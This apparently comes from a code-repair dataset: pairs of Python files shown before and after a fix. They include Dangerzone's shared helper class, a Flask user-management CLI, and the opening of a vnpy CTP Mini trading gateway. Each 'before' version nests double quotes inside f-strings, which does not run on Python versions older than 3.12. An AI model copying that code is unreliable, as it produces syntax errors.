+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███ ██████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███ ▀▀▀▀████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███████ ▄██████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███████ ▄█████████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ████████████████████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(Back.BLACK + Fore.YELLOW + Style.DIM + "│ │")
left_spaces = (15 - len(self.version) - 1) // 2
right_spaces = left_spaces
if left_spaces + len(self.version) + 1 + right_spaces < 15:
right_spaces += 1
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Style.RESET_ALL
+ Back.BLACK
+ Fore.LIGHTWHITE_EX
+ Style.BRIGHT
+ f"{" "*left_spaces}Dangerzone v{self.version}{" "*right_spaces}"
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Style.RESET_ALL
+ Back.BLACK
+ Fore.LIGHTWHITE_EX
+ " https://dangerzone.rocks "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(Back.BLACK + Fore.YELLOW + Style.DIM + "╰──────────────────────────╯")
def get_container_name(self):
if self.custom_container:
return self.custom_container
else:
return "docker.io/flmcode/dangerzone"
def get_resource_path(self, filename):
if getattr(sys, "dangerzone_dev", False):
# Look for resources directory relative to python file
prefix = os.path.join(
os.path.dirname(
os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))
)
),
"share",
)
else:
if platform.system() == "Darwin":
prefix = os.path.join(
os.path.dirname(os.path.dirname(sys.executable)), "Resources/share"
)
elif platform.system() == "Linux":
prefix = os.path.join(sys.prefix, "share", "dangerzone")
else:
# Windows
prefix = os.path.join(os.path.dirname(sys.executable), "share")
resource_path = os.path.join(prefix, filename)
return resource_path
def get_dangerzone_container_path(self):
if getattr(sys, "dangerzone_dev", False):
# Look for resources directory relative to python file
path = os.path.join(
os.path.dirname(
os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))
)
),
"dev_scripts",
"dangerzone-container",
)
if platform.system() == "Windows":
path = f"{path}.bat"
return path
else:
if platform.system() == "Darwin":
return os.path.join(
os.path.dirname(sys.executable), "dangerzone-container"
)
elif platform.system() == "Windows":
return os.path.join(
os.path.dirname(sys.executable), "dangerzone-container.exe"
)
else:
return "/usr/bin/dangerzone-container"
def exec_dangerzone_container(self, args):
args = [self.dz_container_path] + args
args_str = " ".join(pipes.quote(s) for s in args)
print(Style.DIM + "> " + Style.NORMAL + Fore.CYAN + args_str)
# Execute dangerzone-container
return subprocess.Popen(
args,
startupinfo=self.get_subprocess_startupinfo(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
def get_subprocess_startupinfo(self):
if platform.system() == "Windows":
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
return startupinfo
else:
return None
def container_exists(self, container_name):
"""
Check if container_name is a valid container. Returns a tuple like:
(success (boolean), error_message (str))
"""
# Do we have this container?
with self.exec_dangerzone_container(
["ls", "--container-name", container_name]
) as p:
stdout_data, _ = p.communicate()
lines = stdout_data.split(b"\n")
if b"> " in lines[0]:
stdout_data = b"\n".join(lines[1:])
# The user canceled, or permission denied
if p.returncode == 126 or p.returncode == 127:
return False, "Authorization failed"
return
elif p.returncode != 0:
return False, "Container error"
return
# Check the output
if container_name.encode() not in stdout_data:
return False, f"Container '{container_name}' not found"
return True, True
def validate_convert_to_pixel_output(self, common, output):
"""
Take the output from the convert to pixels tasks and validate it. Returns
a tuple like: (success (boolean), error_message (str))
"""
max_image_width = 10000
max_image_height = 10000
# Did we hit an error?
for line in output.split("\n"):
if (
"failed:" in line
or "The document format is not supported" in line
or "Error" in line
):
return False, output
# How many pages was that?
num_pages = None
for line in output.split("\n"):
if line.startswith("Document has "):
num_pages = line.split(" ")[2]
break
if not num_pages or not num_pages.isdigit() or int(num_pages) <= 0:
return False, "Invalid number of pages returned"
num_pages = int(num_pages)
# Make sure we have the files we expect
expected_filenames = []
for i in range(1, num_pages + 1):
expected_filenames += [
f"page-{i}.rgb",
f"page-{i}.width",
f"page-{i}.height",
]
expected_filenames.sort()
actual_filenames = os.listdir(common.pixel_dir.name)
actual_filenames.sort()
if expected_filenames != actual_filenames:
return (
False,
f"We expected these files:\n{expected_filenames}\n\nBut we got these files:\n{actual_filenames}",
)
# Make sure the files are the correct sizes
for i in range(1, num_pages + 1):
with open(f"{common.pixel_dir.name}/page-{i}.width") as f:
w_str = f.read().strip()
with open(f"{common.pixel_dir.name}/page-{i}.height") as f:
h_str = f.read().strip()
w = int(w_str)
h = int(h_str)
if (
not w_str.isdigit()
or not h_str.isdigit()
or w <= 0
or w > max_image_width
or h <= 0
or h > max_image_height
):
return False, f"Page {i} has invalid geometry"
# Make sure the RGB file is the correct size
if os.path.getsize(f"{common.pixel_dir.name}/page-{i}.rgb") != w * h * 3:
return False, f"Page {i} has an invalid RGB file size"
return True, True
| import sys
import os
import inspect
import appdirs
import platform
import subprocess
import pipes
import colorama
from colorama import Fore, Back, Style
from .settings import Settings
class GlobalCommon(object):
"""
The GlobalCommon class is a singleton of shared functionality throughout the app
"""
def __init__(self):
# Version
try:
with open(self.get_resource_path("version.txt")) as f:
self.version = f.read().strip()
except FileNotFoundError:
# In dev mode, in Windows, get_resource_path doesn't work properly for dangerzone-container, but luckily
# it doesn't need to know the version
self.version = "unknown"
# Initialize terminal colors
colorama.init(autoreset=True)
# App data folder
self.appdata_path = appdirs.user_config_dir("dangerzone")
# In case we have a custom container
self.custom_container = None
# dangerzone-container path
self.dz_container_path = self.get_dangerzone_container_path()
# Languages supported by tesseract
self.ocr_languages = {
"Afrikaans": "ar",
"Albanian": "sqi",
"Amharic": "amh",
"Arabic": "ara",
"Arabic script": "Arabic",
"Armenian": "hye",
"Armenian script": "Armenian",
"Assamese": "asm",
"Azerbaijani": "aze",
"Azerbaijani (Cyrillic)": "aze_cyrl",
"Basque": "eus",
"Belarusian": "bel",
"Bengali": "ben",
"Bengali script": "Bengali",
"Bosnian": "bos",
"Breton": "bre",
"Bulgarian": "bul",
"Burmese": "mya",
"Canadian Aboriginal script": "Canadian_Aboriginal",
"Catalan": "cat",
"Cebuano": "ceb",
"Cherokee": "chr",
"Cherokee script": "Cherokee",
"Chinese - Simplified": "chi_sim",
"Chinese - Simplified (vertical)": "chi_sim_vert",
"Chinese - Traditional": "chi_tra",
"Chinese - Traditional (vertical)": "chi_tra_vert",
"Corsican": "cos",
"Croatian": "hrv",
"Cyrillic script": "Cyrillic",
"Czech": "ces",
"Danish": "dan",
"Devanagari script": "Devanagari",
"Divehi": "div",
"Dutch": "nld",
"Dzongkha": "dzo",
"English": "eng",
"English, Middle (1100-1500)": "enm",
"Esperanto": "epo",
"Estonian": "est",
"Ethiopic script": "Ethiopic",
"Faroese": "fao",
"Filipino": "fil",
"Finnish": "fin",
"Fraktur script": "Fraktur",
"Frankish": "frk",
"French": "fra",
"French, Middle (ca.1400-1600)": "frm",
"Frisian (Western)": "fry",
"Gaelic (Scots)": "gla",
"Galician": "glg",
"Georgian": "kat",
"Georgian script": "Georgian",
"German": "deu",
"Greek": "ell",
"Greek script": "Greek",
"Gujarati": "guj",
"Gujarati script": "Gujarati",
"Gurmukhi script": "Gurmukhi",
"Hangul script": "Hangul",
"Hangul (vertical) script": "Hangul_vert",
"Han - Simplified script": "HanS",
"Han - Simplified (vertical) script": "HanS_vert",
"Han - Traditional script": "HanT",
"Han - Traditional (vertical) script": "HanT_vert",
"Hatian": "hat",
"Hebrew": "heb",
"Hebrew script": "Hebrew",
"Hindi": "hin",
"Hungarian": "hun",
"Icelandic": "isl",
"Indonesian": "ind",
"Inuktitut": "iku",
"Irish": "gle",
"Italian": "ita",
"Italian - Old": "ita_old",
"Japanese": "jpn",
"Japanese script": "Japanese",
"Japanese (vertical)": "jpn_vert",
"Japanese (vertical) script": "Japanese_vert",
"Javanese": "jav",
"Kannada": "kan",
"Kannada script": "Kannada",
"Kazakh": "kaz",
"Khmer": "khm",
"Khmer script": "Khmer",
"Korean": "kor",
"Korean (vertical)": "kor_vert",
"Kurdish (Arabic)": "kur_ara",
"Kyrgyz": "kir",
"Lao": "lao",
"Lao script": "Lao",
"Latin": "lat",
"Latin script": "Latin",
"Latvian": "lav",
"Lithuanian": "lit",
"Luxembourgish": "ltz",
"Macedonian": "mkd",
"Malayalam": "mal",
"Malayalam script": "Malayalam",
"Malay": "msa",
"Maltese": "mlt",
"Maori": "mri",
"Marathi": "mar",
"Mongolian": "mon",
"Myanmar script": "Myanmar",
"Nepali": "nep",
"Norwegian": "nor",
"Occitan (post 1500)": "oci",
"Old Georgian": "kat_old",
"Oriya (Odia) script": "Oriya",
"Oriya": "ori",
"Pashto": "pus",
"Persian": "fas",
"Polish": "pol",
"Portuguese": "por",
"Punjabi": "pan",
"Quechua": "que",
"Romanian": "ron",
"Russian": "rus",
"Sanskrit": "san",
"script and orientation": "osd",
"Serbian (Latin)": "srp_latn",
"Serbian": "srp",
"Sindhi": "snd",
"Sinhala script": "Sinhala",
"Sinhala": "sin",
"Slovakian": "slk",
"Slovenian": "slv",
"Spanish, Castilian - Old": "spa_old",
"Spanish": "spa",
"Sundanese": "sun",
"Swahili": "swa",
"Swedish": "swe",
"Syriac script": "Syriac",
"Syriac": "syr",
"Tajik": "tgk",
"Tamil script": "Tamil",
"Tamil": "tam",
"Tatar": "tat",
"Telugu script": "Telugu",
"Telugu": "tel",
"Thaana script": "Thaana",
"Thai script": "Thai",
"Thai": "tha",
"Tibetan script": "Tibetan",
"Tibetan Standard": "bod",
"Tigrinya": "tir",
"Tonga": "ton",
"Turkish": "tur",
"Ukrainian": "ukr",
"Urdu": "urd",
"Uyghur": "uig",
"Uzbek (Cyrillic)": "uzb_cyrl",
"Uzbek": "uzb",
"Vietnamese script": "Vietnamese",
"Vietnamese": "vie",
"Welsh": "cym",
"Yiddish": "yid",
"Yoruba": "yor",
}
# Load settings
self.settings = Settings(self)
def display_banner(self):
"""
Raw ASCII art example:
╭──────────────────────────╮
│ ▄██▄ │
│ ██████ │
│ ███▀▀▀██ │
│ ███ ████ │
│ ███ ██████ │
│ ███ ▀▀▀▀████ │
│ ███████ ▄██████ │
│ ███████ ▄█████████ │
│ ████████████████████ │
│ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ │
│ │
│ Dangerzone v0.1.5 │
│ https://dangerzone.rocks │
╰──────────────────────────╯
"""
print(Back.BLACK + Fore.YELLOW + Style.DIM + "╭──────────────────────────╮")
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ▄██▄ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ██████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███▀▀▀██ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███ ████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███ ██████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███ ▀▀▀▀████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███████ ▄██████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ███████ ▄█████████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ████████████████████ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Fore.LIGHTYELLOW_EX
+ Style.NORMAL
+ " ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(Back.BLACK + Fore.YELLOW + Style.DIM + "│ │")
left_spaces = (15 - len(self.version) - 1) // 2
right_spaces = left_spaces
if left_spaces + len(self.version) + 1 + right_spaces < 15:
right_spaces += 1
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Style.RESET_ALL
+ Back.BLACK
+ Fore.LIGHTWHITE_EX
+ Style.BRIGHT
+ f"{' '*left_spaces}Dangerzone v{self.version}{' '*right_spaces}"
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(
Back.BLACK
+ Fore.YELLOW
+ Style.DIM
+ "│"
+ Style.RESET_ALL
+ Back.BLACK
+ Fore.LIGHTWHITE_EX
+ " https://dangerzone.rocks "
+ Fore.YELLOW
+ Style.DIM
+ "│"
)
print(Back.BLACK + Fore.YELLOW + Style.DIM + "╰──────────────────────────╯")
def get_container_name(self):
if self.custom_container:
return self.custom_container
else:
return "docker.io/flmcode/dangerzone"
def get_resource_path(self, filename):
if getattr(sys, "dangerzone_dev", False):
# Look for resources directory relative to python file
prefix = os.path.join(
os.path.dirname(
os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))
)
),
"share",
)
else:
if platform.system() == "Darwin":
prefix = os.path.join(
os.path.dirname(os.path.dirname(sys.executable)), "Resources/share"
)
elif platform.system() == "Linux":
prefix = os.path.join(sys.prefix, "share", "dangerzone")
else:
# Windows
prefix = os.path.join(os.path.dirname(sys.executable), "share")
resource_path = os.path.join(prefix, filename)
return resource_path
def get_dangerzone_container_path(self):
if getattr(sys, "dangerzone_dev", False):
# Look for resources directory relative to python file
path = os.path.join(
os.path.dirname(
os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))
)
),
"dev_scripts",
"dangerzone-container",
)
if platform.system() == "Windows":
path = f"{path}.bat"
return path
else:
if platform.system() == "Darwin":
return os.path.join(
os.path.dirname(sys.executable), "dangerzone-container"
)
elif platform.system() == "Windows":
return os.path.join(
os.path.dirname(sys.executable), "dangerzone-container.exe"
)
else:
return "/usr/bin/dangerzone-container"
def exec_dangerzone_container(self, args):
args = [self.dz_container_path] + args
args_str = " ".join(pipes.quote(s) for s in args)
print(Style.DIM + "> " + Style.NORMAL + Fore.CYAN + args_str)
# Execute dangerzone-container
return subprocess.Popen(
args,
startupinfo=self.get_subprocess_startupinfo(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
def get_subprocess_startupinfo(self):
if platform.system() == "Windows":
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
return startupinfo
else:
return None
def container_exists(self, container_name):
"""
Check if container_name is a valid container. Returns a tuple like:
(success (boolean), error_message (str))
"""
# Do we have this container?
with self.exec_dangerzone_container(
["ls", "--container-name", container_name]
) as p:
stdout_data, _ = p.communicate()
lines = stdout_data.split(b"\n")
if b"> " in lines[0]:
stdout_data = b"\n".join(lines[1:])
# The user canceled, or permission denied
if p.returncode == 126 or p.returncode == 127:
return False, "Authorization failed"
return
elif p.returncode != 0:
return False, "Container error"
return
# Check the output
if container_name.encode() not in stdout_data:
return False, f"Container '{container_name}' not found"
return True, True
def validate_convert_to_pixel_output(self, common, output):
"""
Take the output from the convert to pixels tasks and validate it. Returns
a tuple like: (success (boolean), error_message (str))
"""
max_image_width = 10000
max_image_height = 10000
# Did we hit an error?
for line in output.split("\n"):
if (
"failed:" in line
or "The document format is not supported" in line
or "Error" in line
):
return False, output
# How many pages was that?
num_pages = None
for line in output.split("\n"):
if line.startswith("Document has "):
num_pages = line.split(" ")[2]
break
if not num_pages or not num_pages.isdigit() or int(num_pages) <= 0:
return False, "Invalid number of pages returned"
num_pages = int(num_pages)
# Make sure we have the files we expect
expected_filenames = []
for i in range(1, num_pages + 1):
expected_filenames += [
f"page-{i}.rgb",
f"page-{i}.width",
f"page-{i}.height",
]
expected_filenames.sort()
actual_filenames = os.listdir(common.pixel_dir.name)
actual_filenames.sort()
if expected_filenames != actual_filenames:
return (
False,
f"We expected these files:\n{expected_filenames}\n\nBut we got these files:\n{actual_filenames}",
)
# Make sure the files are the correct sizes
for i in range(1, num_pages + 1):
with open(f"{common.pixel_dir.name}/page-{i}.width") as f:
w_str = f.read().strip()
with open(f"{common.pixel_dir.name}/page-{i}.height") as f:
h_str = f.read().strip()
w = int(w_str)
h = int(h_str)
if (
not w_str.isdigit()
or not h_str.isdigit()
or w <= 0
or w > max_image_width
or h <= 0
or h > max_image_height
):
return False, f"Page {i} has invalid geometry"
# Make sure the RGB file is the correct size
if os.path.getsize(f"{common.pixel_dir.name}/page-{i}.rgb") != w * h * 3:
return False, f"Page {i} has an invalid RGB file size"
return True, True
|
import sys
import os
import argparse
from typing import List
from flask_script import Manager
from flask_migrate import init, migrate, upgrade, Migrate, MigrateCommand
from deekoo_auth import create_app, db, DEFAULT_CONFIG_PATH
from deekoo_auth.models import User
from deekoo_auth.database import check_database_available
usage = """
A command line tool for adding users to the database
Available tools are
add_user [OPTIONS]
Add a new user to database
list_users
Lists current database accounts
db [OPTIONS]
Interact with the database. (init, migrate, upgrade)
-c, --config
Give the configuration file to use
"""
commands = ('add_user', 'list_users', 'db')
class ServerCli:
def __init__(self):
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument('-c', '--config',
metavar="/path/to/config.py",
help="Instead of using default config, use this one")
parser.add_argument('command',
metavar=f"One of {commands}",
help=f"Entry point for other cli tools, you can select from following actions: {commands}")
args, unkown_args = parser.parse_known_args()
# Modify sys.argv to only leave e.g. cli.py db [db_commands]
sys.argv = [sys.argv[0], sys.argv[1], *unkown_args]
if not hasattr(self, args.command):
print(f"The first argument has to be one of {commands}")
parser.print_usage()
sys.exit(1)
# use the default configuration if config not given
config_path = os.path.abspath(args.config) if args.config else DEFAULT_CONFIG_PATH
getattr(self, args.command)(config_path)
def add_user(self, config_path: str):
parser = argparse.ArgumentParser()
parser.add_argument('--username', required=True, metavar="Anon", help="The user name to be added.")
parser.add_argument('--password', required=True, metavar="Secret", help="The password for the new user.")
parser.add_argument('--email', required=False, metavar="anon@temp.net", help="The email for the new user.")
parser.add_argument('--role', required=False, default='regular', metavar="admin", help="Either basic dude (regular) or admin (admin)")
args = parser.parse_args(sys.argv[2:])
app = create_app(config_path)
check_database_available(app)
with app.app_context():
user = User.add_user(args.username, args.password, args.email)
if user:
db.session.add(user)
db.session.commit()
print(f"created user: {user}")
def list_users(self, config_path: str):
app = create_app(config_path)
check_database_available(app)
with app.app_context():
users = User.query.all()
if len(users) == 0:
print(f"No users in the database at {app.config["SQLALCHEMY_DATABASE_URI"]}")
return
print(f"\nFound {len(users)} user{"s" if len(users) > 1 else ""} in database at {app.config["SQLALCHEMY_DATABASE_URI"]}\n")
for user in users:
print(user)
def db(self, config_path: str):
"""
Small wrapper for flask-migrate
"""
app = create_app(config_path)
# add database migration tools
migrate = Migrate(app, db)
# init the command line tool
manager = Manager(app)
manager.add_command('db', MigrateCommand)
# parse command line arguments
manager.run()
def main():
ServerCli()
if __name__ == "__main__":
main() | import sys
import os
import argparse
from typing import List
from flask_script import Manager
from flask_migrate import init, migrate, upgrade, Migrate, MigrateCommand
from deekoo_auth import create_app, db, DEFAULT_CONFIG_PATH
from deekoo_auth.models import User
from deekoo_auth.database import check_database_available
usage = """
A command line tool for adding users to the database
Available tools are
add_user [OPTIONS]
Add a new user to database
list_users
Lists current database accounts
db [OPTIONS]
Interact with the database. (init, migrate, upgrade)
-c, --config
Give the configuration file to use
"""
commands = ('add_user', 'list_users', 'db')
class ServerCli:
def __init__(self):
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument('-c', '--config',
metavar="/path/to/config.py",
help="Instead of using default config, use this one")
parser.add_argument('command',
metavar=f"One of {commands}",
help=f"Entry point for other cli tools, you can select from following actions: {commands}")
args, unkown_args = parser.parse_known_args()
# Modify sys.argv to only leave e.g. cli.py db [db_commands]
sys.argv = [sys.argv[0], sys.argv[1], *unkown_args]
if not hasattr(self, args.command):
print(f"The first argument has to be one of {commands}")
parser.print_usage()
sys.exit(1)
# use the default configuration if config not given
config_path = os.path.abspath(args.config) if args.config else DEFAULT_CONFIG_PATH
getattr(self, args.command)(config_path)
def add_user(self, config_path: str):
parser = argparse.ArgumentParser()
parser.add_argument('--username', required=True, metavar="Anon", help="The user name to be added.")
parser.add_argument('--password', required=True, metavar="Secret", help="The password for the new user.")
parser.add_argument('--email', required=False, metavar="anon@temp.net", help="The email for the new user.")
parser.add_argument('--role', required=False, default='regular', metavar="admin", help="Either basic dude (regular) or admin (admin)")
args = parser.parse_args(sys.argv[2:])
app = create_app(config_path)
check_database_available(app)
with app.app_context():
user = User.add_user(args.username, args.password, args.email)
if user:
db.session.add(user)
db.session.commit()
print(f"created user: {user}")
def list_users(self, config_path: str):
app = create_app(config_path)
check_database_available(app)
with app.app_context():
users = User.query.all()
if len(users) == 0:
print(f"No users in the database at {app.config['SQLALCHEMY_DATABASE_URI']}")
return
print(f"\nFound {len(users)} user{'s' if len(users) > 1 else ''} in database at {app.config['SQLALCHEMY_DATABASE_URI']}\n")
for user in users:
print(user)
def db(self, config_path: str):
"""
Small wrapper for flask-migrate
"""
app = create_app(config_path)
# add database migration tools
migrate = Migrate(app, db)
# init the command line tool
manager = Manager(app)
manager.add_command('db', MigrateCommand)
# parse command line arguments
manager.run()
def main():
ServerCli()
if __name__ == "__main__":
main() |
"""
"""
from datetime import datetime
from vnpy.api.mini import (
THOST_FTDC_OAS_Submitted,
THOST_FTDC_OAS_Accepted,
THOST_FTDC_OAS_Rejected,
THOST_FTDC_OST_NoTradeQueueing,
THOST_FTDC_OST_PartTradedQueueing,
THOST_FTDC_OST_AllTraded,
THOST_FTDC_OST_Canceled,
THOST_FTDC_D_Buy,
THOST_FTDC_D_Sell,
THOST_FTDC_PD_Long,
THOST_FTDC_PD_Short,
THOST_FTDC_OPT_LimitPrice,
THOST_FTDC_OPT_AnyPrice,
THOST_FTDC_OF_Open,
THOST_FTDC_OFEN_Close,
THOST_FTDC_OFEN_CloseYesterday,
THOST_FTDC_OFEN_CloseToday,
THOST_FTDC_PC_Futures,
THOST_FTDC_PC_Options,
THOST_FTDC_PC_Combination,
THOST_FTDC_CP_CallOptions,
THOST_FTDC_CP_PutOptions,
THOST_FTDC_HF_Speculation,
THOST_FTDC_CC_Immediately,
THOST_FTDC_FCC_NotForceClose,
THOST_FTDC_TC_GFD,
THOST_FTDC_VC_AV,
THOST_FTDC_TC_IOC,
THOST_FTDC_VC_CV,
THOST_FTDC_AF_Delete
)
from vnpy.trader.constant import (
Direction,
Offset,
Exchange,
OrderType,
Product,
Status,
OptionType
)
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
OrderRequest,
CancelRequest,
SubscribeRequest,
)
from vnpy.trader.utility import get_folder_path
from vnpy.trader.event import EVENT_TIMER
from .vnminimd import MdApi
from .vnminitd import TdApi
STATUS_MINI2VT = {
THOST_FTDC_OAS_Submitted: Status.SUBMITTING,
THOST_FTDC_OAS_Accepted: Status.SUBMITTING,
THOST_FTDC_OAS_Rejected: Status.REJECTED,
THOST_FTDC_OST_NoTradeQueueing: Status.NOTTRADED,
THOST_FTDC_OST_PartTradedQueueing: Status.PARTTRADED,
THOST_FTDC_OST_AllTraded: Status.ALLTRADED,
THOST_FTDC_OST_Canceled: Status.CANCELLED
}
DIRECTION_VT2MINI = {
Direction.LONG: THOST_FTDC_D_Buy,
Direction.SHORT: THOST_FTDC_D_Sell
}
DIRECTION_MINI2VT = {v: k for k, v in DIRECTION_VT2MINI.items()}
DIRECTION_MINI2VT[THOST_FTDC_PD_Long] = Direction.LONG
DIRECTION_MINI2VT[THOST_FTDC_PD_Short] = Direction.SHORT
ORDERTYPE_VT2MINI = {
OrderType.LIMIT: THOST_FTDC_OPT_LimitPrice,
OrderType.MARKET: THOST_FTDC_OPT_AnyPrice
}
ORDERTYPE_MINI2VT = {v: k for k, v in ORDERTYPE_VT2MINI.items()}
OFFSET_VT2MINI = {
Offset.OPEN: THOST_FTDC_OF_Open,
Offset.CLOSE: THOST_FTDC_OFEN_Close,
Offset.CLOSETODAY: THOST_FTDC_OFEN_CloseToday,
Offset.CLOSEYESTERDAY: THOST_FTDC_OFEN_CloseYesterday,
}
OFFSET_MINI2VT = {v: k for k, v in OFFSET_VT2MINI.items()}
EXCHANGE_MINI2VT = {
"CFFEX": Exchange.CFFEX,
"SHFE": Exchange.SHFE,
"CZCE": Exchange.CZCE,
"DCE": Exchange.DCE,
"INE": Exchange.INE
}
PRODUCT_MINI2VT = {
THOST_FTDC_PC_Futures: Product.FUTURES,
THOST_FTDC_PC_Options: Product.OPTION,
THOST_FTDC_PC_Combination: Product.SPREAD
}
OPTIONTYPE_MINI2VT = {
THOST_FTDC_CP_CallOptions: OptionType.CALL,
THOST_FTDC_CP_PutOptions: OptionType.PUT
}
symbol_exchange_map = {}
symbol_name_map = {}
symbol_size_map = {}
class MinitestGateway(BaseGateway):
"""
VN Trader Gateway for CTP Mini.
"""
default_setting = {
"用户名": "",
"密码": "",
"经纪商代码": "",
"交易服务器": "",
"行情服务器": "",
"产品名称": "",
"授权编码": "",
"产品信息": ""
}
exchanges = list(EXCHANGE_MINI2VT.values())
def __init__(self, event_engine):
"""Constructor"""
super().__init__(event_engine, "MINITEST")
self.td_api = MiniTdApi(self)
self.md_api = MiniMdApi(self)
def connect(self, setting: dict):
""""""
userid = setting["用户名"]
password = setting["密码"]
brokerid = setting["经纪商代码"]
td_address = setting["交易服务器"]
md_address = setting["行情服务器"]
appid = setting["产品名称"]
auth_code = setting["授权编码"]
product_info = setting["产品信息"]
if not td_address.startswith("tcp://"):
td_address = "tcp://" + td_address
if not md_address.startswith("tcp://"):
md_address = "tcp://" + md_address
self.td_api.connect(td_address, userid, password,
brokerid, auth_code, appid, product_info)
self.md_api.connect(md_address, userid, password, brokerid)
self.init_query()
def subscribe(self, req: SubscribeRequest):
""""""
self.md_api.subscribe(req)
def send_order(self, req: OrderRequest):
""""""
return self.td_api.send_order(req)
def cancel_order(self, req: CancelRequest):
""""""
self.td_api.cancel_order(req)
def query_account(self):
""""""
self.td_api.query_account()
def query_position(self):
""""""
self.td_api.query_position()
def close(self):
""""""
self.td_api.close()
self.md_api.close()
def write_error(self, msg: str, error: dict):
""""""
error_id = error["ErrorID"]
error_msg = error["ErrorMsg"]
msg = f"{msg},代码:{error_id},信息:{error_msg}"
self.write_log(msg)
def process_timer_event(self, event):
""""""
self.count += 1
if self.count < 2:
return
self.count = 0
func = self.query_functions.pop(0)
func()
self.query_functions.append(func)
def init_query(self):
""""""
self.count = 0
self.query_functions = [self.query_account, self.query_position]
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
class MiniMdApi(MdApi):
""""""
def __init__(self, gateway):
"""Constructor"""
super(MiniMdApi, self).__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.reqid = 0
self.connect_status = False
self.login_status = False
self.subscribed = set()
self.userid = ""
self.password = ""
self.brokerid = ""
def onFrontConnected(self):
"""
Callback when front server is connected.
"""
self.gateway.write_log("行情服务器连接成功")
self.login()
def onFrontDisconnected(self, reason: int):
"""
Callback when front server is disconnected.
"""
self.login_status = False
self.gateway.write_log(f"行情服务器连接断开,原因{reason}")
def onRspUserLogin(self, data: dict, error: dict, reqid: int, last: bool):
"""
Callback when user is logged in.
"""
if not error["ErrorID"]:
self.login_status = True
self.gateway.write_log("行情服务器登录成功")
for symbol in self.subscribed:
self.subscribeMarketData(symbol)
else:
self.gateway.write_error("行情服务器登录失败", error)
def onRspError(self, error: dict, reqid: int, last: bool):
"""
Callback when error occured.
"""
self.gateway.write_error("行情接口报错", error)
def onRspSubMarketData(self, data: dict, error: dict, reqid: int, last: bool):
""""""
